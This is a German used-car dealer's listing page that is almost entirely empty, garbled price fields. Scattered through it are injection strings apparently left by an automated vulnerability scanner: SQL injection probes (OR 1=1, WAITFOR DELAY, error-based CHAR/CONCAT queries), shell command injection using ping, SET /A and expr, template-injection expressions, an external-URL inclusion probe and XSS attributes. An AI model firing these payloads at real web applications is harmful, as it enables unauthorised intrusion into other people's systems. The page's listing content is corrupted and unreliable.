Autohaus Nissen GmbH - Hattlund 13 - 24972 Steinbergkirche - 04632/8758-0

Gebrauchtwagen / sonstige

x

Preis incl. MwSt.

 
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  -1 OR 1=1
 3

3.- €

  3
 3

"& ping -n.- €

  '
 3

3.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

1 AND 'NS='.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

' OR 'ns'='.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

-1 OR 17-7=.- €

 
 

.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

1 OR X='ss.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

' OR '1'='1.- €

 
 

.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

' OR '1'='1.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

 
 

"& ping -n.- €

 
 

.- €

 
 

.- €

  -1 OR 1=1
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

-1 OR 1=1.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

' OR 'ns'='.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

-1 OR 17-7=.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

1 OR X='ss.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

' OR '1'='1.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

' OR '1'='1.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

-1 OR 1=1.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

-1 OR 1=1.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

'.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

NS1NO.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

1 AND 'NS='.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

-1 OR 1=1.- €

 
 

.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

'.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

NS1NO.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

'& ping -n.- €

  3
 3

3.- €

  NS1NO
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

'& ping -n.- €

  1 AND 'NS='ss
 3

3.- €

  3
 3

3.- €

 
 

hTTp://r87..- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

 
 

& ping -n 2.- €

  3
 3

3.- €

  ' OR 'ns'='ns
 3

3.- €

  3
 3

hTTp://r87..- €

  3
 3

& ping -n 2.- €

  3
 3

3.- €

 
 

"& SET /A 0.- €

  3
 3

3.- €

  3
 3

3.- €

  -1 OR 17-7=10
 3

3.- €

 
 

.- €

 
 

ping -n 25.- €

  3
 3

3.- €

  3
 3

"& SET /A 0.- €

 
 

.- €

  1 OR X='ss
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

ping -n 25.- €

  ' OR '1'='1
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

.- €

 
 

'& SET /A 0.- €

 '>
 

.- €

  3
 3

3.- €

 
 

"&ping -c 2.- €

  ' OR '1'='1
 3

3.- €

  3
 3

'& SET /A 0.- €

 
 

http://r87..- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

"&ping -c 2.- €

  -1 OR 1=1
 3

3.- €

 
 

& SET /A 0x.- €

  3
 3

http://r87..- €

  3
 3

3.- €

  3
 3

3.- €

 '> 3
 3

3.- €

 
 

'&ping -c 2.- €

  3
 3

3.- €

  -1 OR 1=1
 3

3.- €

  3
 3

& SET /A 0x.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

 
 

.- €

 
 

.- €

  '
 3

3.- €

  3
 3

'&ping -c 2.- €

 
 

SET /A 0xFF.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

.- €

  NS1NO
 3

3.- €

  3
 3

3.- €

 
 

&ping -c 25.- €

  3
 3

SET /A 0xFF.- €

 
 

'"-->

 
 

.- €

 
 

.- €

 
 

r87.com/n.- €

  3
 3

3.- €

  1 AND 'NS='ss
 3

3.- €

 
 

.- €

  3
 3

&ping -c 25.- €

 
 

"&expr 2684.- €

  3
 3

'"-->

  3
 3

3.- €

  3
 3

3.- €

  3
 3

r87.com/n.- €

  ' OR 'ns'='ns
 3

3.- €

  3
 3

3.- €

 
 

ping -c 25.- €

  3
 3

"&expr 2684.- €

 
 

%27%22--%3E.- €

 
 

.- €

  hTTp://r87.com/n
 

.- €

  3
 3

3.- €

  -1 OR 17-7=10
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

ping -c 25.- €

 
 

'&expr 2684.- €

  3
 3

3.- €

  3
 3

%27%22--%3E.- €

  1 OR X='ss
 3

3.- €

  hTTp://r87.com/n
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

ping -n 25.- €

  3
 3

'&expr 2684.- €

 
 

data:;base6.- €

 (SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+''>
 

.- €

  ' OR '1'='1
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

ping -n 25.- €

 
 

&expr 26840.- €

 (SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+''> 3
 3

3.- €

  3
 3

data:;base6.- €

  3
 3

3.- €

 
 

ping -c 25.- €

 
 3

3.- €

  ' OR '1'='1
 3

3.- €

  3
 3

3.- €

  3
 3

&expr 26840.- €

 
 

.- €

 
 

'" ns= nets.- €

 
 

.- €

  3
 -1 OR 1=1

3.- €

  http://r87.com/n?.php
 

.- €

 
 

.- €

  3
 3

ping -c 25.- €

  3
 3

3.- €

 
 

expr 268409.- €

  3
 3

3.- €

  3
 3

'" ns= nets.- €

  3
 3

3.- €

  "& ping -n 25 127.0.0.1 &
 

.- €

  http://r87.com/n?.php
 3

3.- €

  3
 -1 OR 1=1

3.- €

  3
 3

3.- €

  3
 3

expr 268409.- €

 
 

.- €

 
 

1 ns=netspa.- €

 
 

.- €

  3
 '

3.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  "& ping -n 25 127.0.0.1 &
 3

3.- €

 
 

SET /A 0xFF.- €

  3
 3

3.- €

  3
 3

1 ns=netspa.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

SET /A 0xFF.- €

 
 3

3.- €

  '& ping -n 25 127.0.0.1 &
 

.- €

 
 

.- €

  3
 NS1NO

3.- €

 
 

//r87.com/n.- €

 
 

.- €

 
 

.- €

  r87.com/n
 

.- €

 
 

expr 268409.- €

  3
 3

3.- €

  '& ping -n 25 127.0.0.1 &
 3

3.- €

  3
 1 AND 'NS='ss

3.- €

  3
 3

3.- €

  3
 3

//r87.com/n.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 ' OR 'ns'='ns

3.- €

 
 

.- €

  & ping -n 25 127.0.0.1 &
 

.- €

  3
 3

expr 268409.- €

 
 

'>

  r87.com/n
 3

3.- €

 
 

.- €

 
 

.- €

  3
 -1 OR 17-7=10

3.- €

  & ping -n 25 127.0.0.1 &
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 hTTp://r87.com/n

.- €

 
 


 
.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

(select con.- €

 
 

.- €

 
 

.- €

 
 

netsparker.- €

 
 "&ping -c 25 127.0.0.1 &"

.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

 
 

'+ (select.- €

 
 

.- €

 
 3

3.- €

  3
 3

3.- €

  3
 3

netsparker.- €

  3
 3

3.- €

  3
 "&ping -c 25 127.0.0.1 &"

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

'+ (select.- €

 
 "& SET /A 0xFFF9999-2 &

.- €

 
 '&ping -c 25 127.0.0.1 &'

.- €

 
 

.- €

 
 

'+netsp.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

 
 

.- €

 
 

.- €

 
 

convert(int.- €

  3
 "& SET /A 0xFFF9999-2 &

3.- €

  3
 '&ping -c 25 127.0.0.1 &'

3.- €

  3
 3

'+netsp.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

convert(int.- €

  3
 3

3.- €

 
 '& SET /A 0xFFF9999-2 &

.- €

 
 &ping -c 25 127.0.0.1 &

.- €

  '"-->
 

.- €

 
 

-1" and 6=3.- €

  3
 '&expr 268409241 - 2 &'

3.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

-1" and 6=3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

 
 

ns:netspar.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

 
 &expr 268409241 - 2 &

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

(SELECT CON.- €

 
 

.- €

  3
 3

ns:netspar.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 &expr 268409241 - 2 &

3.- €

  '" ns= netsparker(0x0019CB)
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

(SELECT CON.- €

  3
 3

3.- €

  ns:netsparker056650=vuln
 

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 expr 268409241 - 2 &

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

cast((selec.- €

 
 

.- €

  ns:netsparker056650=vuln
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 expr 268409241 - 2 &

3.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

 
 '"-->

.- €

  3
 3

cast((selec.- €

 
 

.- €

  3
 3

3.- €

  http://example.com/? ns: netsparker0566
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 SET /A 0xFFF9999-2

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

'||cast((se.- €

  3
 3

3.- €

 
 

.- €

  http://example.com/? ns: netsparker0566
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 SET /A 0xFFF9999-2

3.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

 
 '>

.- €

  3
 3

'||cast((se.- €

 
 

.- €

  3
 3

3.- €

  ns:netsparker056650=vuln
 

.- €

 
 

.- €

  3
 3

3.- €

 
 expr 268409241 - 2

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

(select chr.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  ns:netsparker056650=vuln
 3

3.- €

 
 

.- €

  3
 expr 268409241 - 2

3.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

(select chr.- €

 
 

.- €

  3
 3

3.- €

 
 ">

.- €

 
 

.- €

  ns:netsparker056650=vuln
 

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

NSFTW.- €

  3
 3

3.- €

  3
 3

3.- €

  ns:netsparker056650=vuln
 3

3.- €

 
 

.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 

3.- €

 
 

.- €

 
 

.- €

  3
 3

NSFTW.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

 
  ns:netsparker056650=vuln

.- €

 
 -->

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

'+NSFTW+'.- €

  3
  ns:netsparker056650=vuln

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

'+NSFTW+'.- €

 
 

.- €

 
 http://example.com/? ns: netsparker056650=vuln

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

 
 

${28275*282.- €

 
 'stYle='x:expre/**/ssion(netsparker(9))

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

(SELECT 1 a.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

response.wr.- €

 
 

.- €

  3
 3

${28275*282.- €

 
 

.- €

 
 

.- €

  3
 http://example.com/? ns: netsparker056650=vuln

3.- €

  3
 3

3.- €

  3
 3

(SELECT 1 a.- €

 
 

.- €

  3
 3

3.- €

  3
 3

response.wr.- €

 
 

#{28275*282.- €

  3
 3

3.- €

  3
 3

3.- €

 
 ns:netsparker056650=vuln

.- €

  3
 3

3.- €

 
 

.- €

 
 "stYle="x:expre/**/ssion(netsparker(9))

.- €

 
 

-1'+(SELECT.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

+response.w.- €

 
 

.- €

  3
 3

#{28275*282.- €

 
 

.- €

  3
 ns:netsparker056650=vuln

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

-1'+(SELECT.- €

 
 

.- €

  3
 3

3.- €

  3
 3

+response.w.- €

  3
 3

3.- €

  ${28275*28275-(13)}
 

.- €

  3
 3

3.- €

 
  ns:netsparker056650=vuln

.- €

  3
 3

3.- €

 
 

.- €

 
  stYle=x:expre/**/ssion(netsparker(9))

.- €

 
 

-1\'+(selec.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

"+response..- €

 
 

.- €

  ${28275*28275-(13)}
 3

3.- €

 
 

.- €

  3
  ns:netsparker056650=vuln

3.- €

 
 

.- €

  3
 3

-1\'+(selec.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

"+response..- €

  3
 3

3.- €

  3
 3

3.- €

  #{28275*28275-(13)}
 

.- €

 
 

.- €

  3
 3

3.- €

 
 

1,1 procedu.- €

 
 

.- €

 
 >

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

<% response.- €

  #{28275*28275-(13)}
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

1,1 procedu.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

<% response.- €

 
 ${28275*28275-(13)}

.- €

  3
 3

3.- €

 
 

.- €

 
 

(length(CTX.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 ">

.- €

 
 

print(int)0.- €

  3
 ${28275*28275-(13)}

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

(length(CTX.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

print(int)0.- €

  3
 3

3.- €

 
 #{28275*28275-(13)}

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

 
 

'||CTXSYS.D.- €

 
 

.- €

  3
 3

3.- €

 
 '>

.- €

  3
 #{28275*28275-(13)}

3.- €

 
 

+print(int).- €

  3
 3

'||CTXSYS.D.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  %27
 

.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

+print(int).- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  %27
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 >

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

'+print(int.- €

 
 

.- €

  (select convert(int,CHAR(95)+CHAR(33)+CH
 

.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

'+print(int.- €

 
 

.- €

  3
 3

3.- €

  (select convert(int,CHAR(95)+CHAR(33)+CH
 3

3.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 '>

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

"+print(int.- €

 
 

.- €

  '+ (select convert(int,CHAR(95)+CHAR(33)
 

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

"+print(int.- €

  3
 3

3.- €

  '+ (select convert(int,CHAR(95)+CHAR(33)
 3

3.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

 
 

.- €

 
 '>

.- €

  convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+
 

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

  convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

.- €

 
 

{php}print(.- €

  3
 3

3.- €

 
 

.- €

  '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(6
 

.- €

 
 ">

.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

{php}print(.- €

 
 

' WAITFOR D.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(6
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

'{${print(i.- €

 
 3

3.- €

  3
 3

' WAITFOR D.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

 
 >

.- €

  'AND 1=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(
 

.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

'{${print(i.- €

 
 

1 WAITFOR D.- €

  3
 3

3.- €

  3
 3

3.- €

  'AND 1=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

[php]print(.- €

  3
 3

1 WAITFOR D.- €

 
 

.- €

 
 

.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  -1 or 1=1 and (SELECT 1 and ROW(1,1)>(SE
 

.- €

 
 ">

.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

[php]print(.- €

 
 

WAITFOR DEL.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  -1 or 1=1 and (SELECT 1 and ROW(1,1)>(SE
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

print 0xFFF.- €

  3
 3

WAITFOR DEL.- €

 
 

.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1
 

.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

print 0xFFF.- €

 
 /"onload="netsparker(9)

.- €

 
 

1) WAITFOR.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

.- €

  -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1
 3

3.- €

 
 

eval('print.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

1) WAITFOR.- €

 
 

.- €

  3
 3

3.- €

  -1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1
 

.- €

  3
 3

eval('print.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

 
 

.- €

 
 

') WAITFOR.- €

  3
 3

3.- €

 
 /'onload='netsparker(9)

.- €

 
 

.- €

  -1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1
 3

3.- €

 
 

'+print 0xF.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

') WAITFOR.- €

 
 

.- €

  3
 3

3.- €

  (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64
 

.- €

  3
 3

'+print 0xF.- €

 
 

.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

 
 

')) WAITFOR.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

  (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64
 3

3.- €

 
 / onload=netsparker(9)

.- €

 
 

"+print 0xF.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

')) WAITFOR.- €

 
 

.- €

  3
 3

3.- €

  cast((select chr(95)||chr(33)||chr(64)||
 

.- €

 
 

.- €

 
 

1)) WAITFOR.- €

  3
 3

"+print 0xF.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

  cast((select chr(95)||chr(33)||chr(64)||
 3

3.- €

  3
 3

3.- €

  response.write(268409241-22)'
 

.- €

 
 /"stYle="x:expre/**/ssion(netsparker(9))

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

1)) WAITFOR.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  '||cast((select chr(95)||chr(33)||chr(64
 

.- €

 
 

.- €

 
 

.- €

 
 

.- €

  response.write(268409241-22)'
 3

3.- €

 
 

1));DECLARE.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  '||cast((select chr(95)||chr(33)||chr(64
 3

3.- €

 
 

.- €

  3
 3

3.- €

  +response.write(268409241-22)'
 

.- €

  3
 3

3.- €

 
 /'stYle='x:expre/**/ssion(netsparker(9))

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

1));DECLARE.- €

 
 

.- €

  +response.write(268409241-22)'
 3

3.- €

  3
 3

3.- €

  (select chr(95)||chr(33)||chr(64)||chr(5
 

.- €

 
 

.- €

  3
 3

3.- €

  "+response.write(268409241-22)+"
 

.- €

 
 

.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

 
 

1;DECLARE/*.- €

  (select chr(95)||chr(33)||chr(64)||chr(5
 3

3.- €

  3
 3

3.- €

 
 / stYle=x:expre/**/ssion(netsparker(9))

.- €

 
 

.- €

  3
 3

3.- €

 
 

.- €

  3
 3

3.- €

  3
 3

3.- €

  3
 3

1;DECLARE/*.- €

